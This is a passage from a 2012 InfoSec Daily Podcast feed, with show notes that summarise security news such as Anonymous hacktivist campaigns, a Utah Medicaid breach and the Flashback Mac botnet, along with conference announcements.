<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous also identified the personal website of Home Secretary Theresa May as a target and mounted an assault on the site for the U.S. House of Representatives. The attack on May&#39;s site never materialized and the one on Congress was rebuffed, according to The Independent.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attacks were part of what Anonymous is calling Operation Trial at Home, a protest against the extradition to the United States of two British nationals, Richard O&#39;Dwyer and Christopher Tappin, and proposed extradition of a third, Gary McKinnon.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">O&#39;Dwyer, 23, is the founder of the TVShack, a website that provides links to movies and TV shows, including links to alleged pirated material.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/china-admits-anonymous-hacks/11376"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/china-admits-anonymous-hacks/11376</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After Anonymous hacked hundreds of Chinese government, company, and other general websites, China has acknowledged the attacks. Meanwhile, Anonymous China has not stopped its onslaught. &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier this week I wrote about how the hacktivist group Anonymous has a new Chinese branch,</span><a href="https://twitter.com/#%21/AnonymousChina"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Anonymous China</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which has been very active since it launched its Twitter account on March 30, 2012. The group has hacked and defaced hundreds of Chinese government, company, and other general websites over the last week. A few targets have had their administrator accounts, phone numbers, and e-mail addresses posted publicly. Last but not least, on many of the hacked sites, the group even posted tips for how to circumvent the Great Firewall of China. Surprisingly, the Chinese government has acknowledged the attacks.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While Anonymous was not specifically mentioned, it&rsquo;s obvious what China&rsquo;s Ministry of Foreign Affairs was referring to during a briefing on Thursday, given the events during the last week.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;First of all, China&rsquo;s Internet is open to all, users enjoy total freedom online. China has gained 500 million netizens and 300 million bloggers in a very short period of time, which shows the attraction and openness of China&rsquo;s Internet,&rdquo; spokesman Hong Lei said in a statement, according to</span><a href="http://www.cnn.com/2012/04/06/world/asia/anonymous-china-hackers/index.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CNN</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &ldquo;Secondly, the Chinese government manages the Internet according to law and regulations. Thirdly, certain reports prove again that China is a victim of internet hacker attacks.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous China has not relented. Since my last article, here&rsquo;s what the group has been up to.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.cyberwarzone.com/cyberwarfare/american-universities-infected-foreign-spies-detected-fbi"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cyberwarzone.com/cyberwarfare/american-universities-infected-foreign-spies-detected-fbi</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Michigan State University President Lou Anna K. Simon contacted the Central Intelligence Agency in late 2009 with an urgent question.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The school&rsquo;s campus in Dubai needed a bailout and an unlikely savior had stepped forward: a Dubai-based company that offered to provide money and students.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Simon was tempted. She also worried that the company, which had investors from Iran and wanted to recruit students from there, might be a front for the Iranian government, she said. If so, an agreement could violate federal trade sanctions and invite enemy spies.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The CIA couldn&rsquo;t confirm that the company wasn&rsquo;t an arm of Iran&rsquo;s government. Simon rejected the offer and shut down undergraduate programs in Dubai, at a loss of $3.7 million.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hearkening back to Cold War anxieties, growing signs of spying on U.S. universities are alarming national security officials. As schools become more global in their locations and student populations, their culture of openness and international collaboration makes them increasingly vulnerable to theft of research conducted for the government and industry.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We have intelligence and cases indicating that U.S. universities are indeed a target of foreign intelligence services,&rdquo; Frank Figliuzzi, Federal Bureau of Investigation assistant director for counterintelligence, said in a February interview in the bureau&rsquo;s Washington headquarters.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While overshadowed by espionage against corporations, efforts by foreign countries to penetrate universities have increased in the past five years, Figliuzzi said. The FBI and academia, which have often been at loggerheads, are working together to combat the threat, he said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attempts by countries in East Asia, including China, to obtain classified or proprietary information by &ldquo;academic solicitation,&rdquo; such as requests to review academic papers or study with professors, jumped eightfold in 2010 from a year earlier, according to a 2011 U.S. Defense Department report. Such approaches from the Middle East doubled, it said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Placing academics at U.S. research institutions under the guise of legitimate research offers access to developing U.S. technologies and cutting-edge research&rdquo; in such areas as information systems, lasers, aeronautics and underwater robots, the report said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-641-strange-wifi-medicaid-hack-optrialathome-china-admits-and-college-spies/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3746/0/infosec-daily-podcast-episode-641.mp3" length="23079584" type="audio/mpeg" />
		<itunes:duration>0:48:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 641 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, A[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 641 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://bits.blogs.nytimes.com/2012/04/06/courtyard-marriott-wifi/
Justin Watt, a Web engineer, was browsing the Web in his room at the Courtyard Marriott in Midtown Manhattan this week when he saw something strange. On his personal blog, a mysterious gap was appearing at the top of the page.
After some sleuthing, Mr. Watt, who has a background in developing Web advertising tools, realized that the quirk was not confined to his site. The hotel&#8217;s Internet service was secretly injecting lines of code into every page he visited, code that could allow it to insert ads into any Web page without the knowledge of the site visitor or the page&#8217;s creator. (He did not actually see any such ads.)
Mr. Watt posted about the discovery on his blog, and that soon spawned a conversation on Hacker News, a discussion site for tech topics, about the ethics of this technique. One commenter described it as &#8220;icky,&#8221; and another asked, &#8220;Why aren&#8217;t they putting ads in my pillow?&#8221;
Mr. Watt had strong feelings about it himself. He said in an interview that he had never seen an Internet provider modifying Web pages that a person visits. &#8220;Imagine the U.S.P.S., or FedEx, for that matter, opening your Amazon boxes and injecting ads into the packages,&#8221; Mr. Watt said.
A test of the Courtyard Marriott&#8217;s wireless network on Friday verified Mr. Watt&#8217;s claims. The code was embedded in the pages of several Web sites visited, including Reddit, GigaOM and TechMeme.
&#8230;
Source: &#160;http://www.zdnet.com/blog/security/medicaid-hacked-over-181000-records-and-25000-ssns-stolen/11432
The Utah Department of Health has been hacked. 181,604 Medicaid/CHIP recipients have had their personal information stolen. 25,096 have had their Social Security numbers (SSNs) compromised. &#160;&#160;&#160; 
The Utah Department of Technology Services (DTS) notified the Utah Department of Health (UDOH) on Monday the server tha[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 640 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-640-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-640-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Mon, 09 Apr 2012 03:16:31 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3742</guid>
		<description><![CDATA[Episode 640 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 640 for April 7, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez. Guests: aricon, connection, hackett, oncee and spridel &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 640 &#8211; Weekend Wrap-up with Dr. b0n3z</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 640 for April 7, 2012. </span><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Tonight&#039;s podcast is hosted by Dr. Bonez.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Guests: aricon, connection, hackett, oncee and spridel</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Outerz0ne 8<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: April 20-21, 2012<br class="kix-line-break" /></p>
<p>	Where: Wellesley Inn, Atlanta GA</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.outerz0ne.org/"><span>http://www.outerz0ne.org</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28-29, 2012<br class="kix-line-break" /></p>
<p>	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /></p>
<p>	</span><a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012<br class="kix-line-break" /></p>
<p>	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /></p>
<p>	</span><a href="http://www.appyide.org/"><span>http://www.appyide.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012<br class="kix-line-break" /></p>
<p>	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /></p>
<p>	</span><a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /></p>
<p>	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> <br class="kix-line-break" /></p>
<p>	</span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /></p>
<p>	Where: Black Hat Vegas</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012<br class="kix-line-break" /></p>
<p>	Where: &nbsp;Bristol, UK</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /></p>
<p>	Where: &nbsp;Columbia, MD</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /></p>
<p>	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /></p>
<p>	Where: Black Hat Vegas<br class="kix-line-break" /></p>
<p>	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /></p>
<p>	Where: Louisville, KY<br class="kix-line-break" /></p>
<p>	</span><a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Skydogcon</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><br class="kix-line-break" /></p>
<p>	When: October 26-28<br class="kix-line-break" /></p>
<p>	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /></p>
<p>	</span><a href="http://www.skydogcon.com/"><span>http://www.skydogcon.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.theverge.com/2012/4/4/2925221/european-union-law-it-attack-criminal-offence"><span>http://www.theverge.com/2012/4/4/2925221/european-union-law-it-attack-criminal-offence</span></a></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">European Union legislators have approved a draft law that would make cyber attacks on IT systems a criminal offense, punishable by at least two years in prison. The proposed law is an update to an existing one, and would also </span><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">prohibit anyone from producing or selling the kinds of programs that can be used for these attacks</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> &mdash; essentially making it impossible for a company to make software that could be used to test its own security, since it could also be used to attack others. While the penalty for these offenses would start at two years, in cases involving &quot;aggravating circumstances&quot; (i.e. a large-scale attack that causes plenty of financial damage), the sentence would be at least five years. The EU voted overwhelmingly in favor of the law, with 50 votes for as opposed to just one against, and a final decision is expected to be made over the summer.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;font-style: italic;vertical-align: baseline">comment by aricon</span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">: This is a lot like the german law passed a few years ago which saw a significant amount of brain drain in the security community there. &nbsp;What will other EU countries do when they have even less security knowledge to draw upon in order to compete?</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.pcworld.com/businesscenter/article/253403/mac_malware_outbreak_is_bigger_than_conficker.html"><span>http://www.pcworld.com/businesscenter/article/253403/mac_malware_outbreak_is_bigger_than_conficker.html</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#039;An estimated 600,000 or more Macs are currently compromised and part of a massive botnet thanks to the Flashback Trojan. To put the size of the threat in some perspective, the Flashback Trojan botnet is even bigger than the massive Conficker botnet&hellip;relatively speaking.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The Conficker botnet compromised an estimated seven million plus Windows PCs around the world at its peak. Seven million is obviously much larger than 600,000, but Windows also has a significantly higher number of PCs in use around the world.</span></b></p>
<p><b><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">According to current </span><a href="http://marketshare.hitslink.com/operating-system-market-share.aspx?qprid=8&amp;qpcustomd=0"><span>data from Net Applications</span></a><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">, Mac OS X is the number two desktop OS with 6.54 percent market share. Windows, on the other hand, accounts for 92.48 percent of the market. Based on market share, the Flashback Trojan botnet is equivalent to a Windows botnet of nearly 8.5 million PCs. That makes it an even larger threat than Conficker&#8211;just on a much smaller platform.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The Flashback Trojan is actually a misnomer at this point. It was a Trojan horse when it was originally discovered last year. A Trojan horse&mdash;as the historical reference implies&mdash;is malware that is disguised as something benign. The original threat masqueraded as an update for Adobe Flash that compromised machines when executed.</span></b></p>
